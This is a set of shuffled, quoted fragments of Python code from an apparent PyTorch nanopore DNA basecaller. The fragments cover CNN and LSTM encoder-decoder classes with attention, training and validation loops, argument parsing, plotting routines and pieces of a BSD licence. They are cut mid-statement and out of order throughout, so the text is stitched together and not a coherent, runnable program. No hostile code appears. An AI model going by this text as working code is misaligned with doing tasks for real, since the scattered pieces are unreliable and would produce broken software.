"range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train()",
"= output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices",
"# rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder",
"sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf()",
"iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2]",
"with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :,",
"{} dict_weights = {} dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0",
"# input gate start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end],",
"matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math",
"levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res",
"dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) #",
"= ed # else: # ed = 0 # ed2 = old_ed #",
"[v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy",
"bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\",",
"input_decoder.argmax(1) # get argmax of prediction #if teacher forcing, use actual next token",
"it has, it will make a checkpoint of the current model if earlyStopping:",
"INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF",
"editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss,",
"torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate cross",
"hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation:",
"ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized",
"nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) #",
"input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1,",
"1, 2) # input for LSTM batch_size x seq_length x input_size #### LSTM",
"feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy),",
"from validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input,",
"std) def forward(self, x, hidden): h, c = hidden h = h.view(h.size(0), -1)",
"dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim =",
">= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i < true_y_len # get",
"seq_target = target[idx] encoded_pred = [] for p in seq: if p ==",
"sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools",
"output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim",
"updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation))",
"dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def",
"0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len,",
"\"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars",
"fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\")",
"of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim] # shape",
"pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance",
"heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler =",
"my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset train_loader =",
"outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start = start self.end =",
"h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) #",
"max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass, backward",
"\"Encoder and decoder must have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio,",
"input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val,",
"self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) #",
"= start self.end = end def __eq__(self, other): return self.start <= other <=",
"torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor),",
"not_padded_batches = i < true_y_len # get indices of not padded sequences true_y_len",
"of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\")",
"arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of",
"bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This",
"Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set",
"# [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 =",
"= output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout",
"return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\",",
"= {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder =",
"import h5py import numpy as np import os import sys import torch import",
"= gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate",
"from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg')",
"1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that",
"* 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD:",
"= (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train +=",
"pandas as pd import argparse from distutils.util import strtobool from polyleven import levenshtein",
"wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\")",
"distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\")",
"validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\")",
":]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original",
"editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training",
"validation set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation",
"train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch",
"plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0,",
"sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1,",
"4 * hidden_size, bias=bias) self.port = port def reset_parameters(self): std = 1.0 /",
"sorted_labels_len))) # ed2 = ed # else: # ed = 0 # ed2",
"fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs.",
"requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels,",
"sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?',",
"outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length, batch size, output dim]",
"in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1,",
"__init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias",
"y[:, :, i] # batch, features, seq len if self.attention: # ATTENTION MECHANISM",
"# batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio,",
"1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio),",
"start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2)",
"BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,",
"n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start,",
"OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR",
"data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val",
"return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for",
"type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"= 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd =",
"import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock,",
"plt.title(\"Edit Distance vs. updates from trainings set\") if pdf is not None: pdf.savefig(fig,",
"editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4],",
"= True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\")",
"30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration +",
"ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch))",
"sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1,",
"fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3],",
"> 1: not_padded_batches = i < true_y_len # get indices of not padded",
"= parser.parse_args(argv[1:]) infile = args.input fname = args.output port = args.gpu_port SEED =",
"evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val = val_ds[0] input_y_val = val_ds[1]",
"return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x,",
"strides = args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type",
"vs. updates from validation set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0,",
"val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between 1",
"probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda",
"import editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4:",
"and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE",
"/ float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100))",
"and \"linear\" not in p: n = matrix_param[p].shape[0] # input gate start, end",
"model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\" in name:",
"#\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input",
"label = y[:, :, i] # batch, features, seq len if self.attention: #",
"\"forget gate\", \"cell activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2, 2,",
"# (batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class",
"get only batches that are NOT padded h = hidden[0][:, not_padded_batches, :] c",
"stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input =",
"distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\")",
"= True # Load data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\",",
"not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden = (h, c) label =",
"parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every",
"return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden =",
"port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size =",
"end def __eq__(self, other): return self.start <= other <= self.end def make_argparser(): parser",
"LSTM layer # shape of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out:",
"args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout = args.dropout",
"= False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True #",
"[] editd_iteration = [] for iteration, data in enumerate(train_loader): model.train() #Set the parameter",
"label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if",
"BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self,",
"in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda",
"edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train,",
"pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val,",
"editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return editd, num_chars def trainNet(model,",
"hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port),",
"INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT",
"= False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim",
"start, end = n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start,",
"signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object",
"input_decoder # [max. target length, batch size, output dim] top1 = input_decoder.argmax(1) #",
"= [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port),",
"pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set =",
"b both have shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence length",
"performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val],",
"start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start,",
"+ \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for",
"pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD)",
"----------- # * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The Encoder",
"np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train =",
"argparse from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping",
"so that they match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long())",
"epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1)))",
"epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on the validation",
"+ 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val =",
"return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10,",
"ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend()",
"F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy =",
"plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if pdf",
"bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def reset_parameters(self):",
"ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy",
"11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m,",
"* cellgate) hy = outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(),",
"# In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset =",
"and \"lstm\" in name and \"linear\" not in name: for b in [\"input\",",
":].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden",
"= optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion =",
"we got to the last element in the batch if i == max_in_batch:",
"assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be equal!\"",
"sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from",
"predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot",
"output = torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x out_size #",
"nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11,",
"= nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2,",
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF",
"help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)),",
"# Forward pass through LSTM layer # shape of lstm_in: [batch, input_dim] #",
"<= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True,",
"----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder",
"updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] =",
"labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN",
"% make_validation == 0): # or (updates == n_epochs-1)): if reduced_TF: #if updates",
"args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop",
"Redistributions in binary form must reproduce the above copyright notice, this list of",
"LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE",
"early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in",
"val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4]",
"self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size,",
"self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim *",
"descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len,",
"to check if it has decresed, # and if it has, it will",
"ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend()",
"through LSTM layer # shape of lstm_in: [batch, input_dim] # shape of lstm_out:",
"\"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start, 3600)",
"#if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1",
"acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train",
"const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256,",
"2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in",
"features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length,",
"HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT",
"sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns",
"heatmap_w = None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed",
"print(name,param.data.size()) n = param.size(0) # forget gate start, end = n//4, n//2 #",
"dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val",
"equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have",
"updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward()",
"plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax = fig.add_subplot(1, 3, 3)",
"\"bias\" in p and \"lstm\" in p and \"linear\" not in p: n",
"pass through LSTM layer # shape of lstm_in: [batch, input_dim] # shape of",
"# get argmax of prediction #if teacher forcing, use actual next token as",
"the above copyright notice, this list of conditions and the following disclaimer. 2.",
"\"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4",
"IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED",
"output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p",
"dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2",
"updates from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for",
"and the following disclaimer. 2. Redistributions in binary form must reproduce the above",
"int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred = [] for p in",
"from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import",
"input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train",
"h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) #",
"lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward",
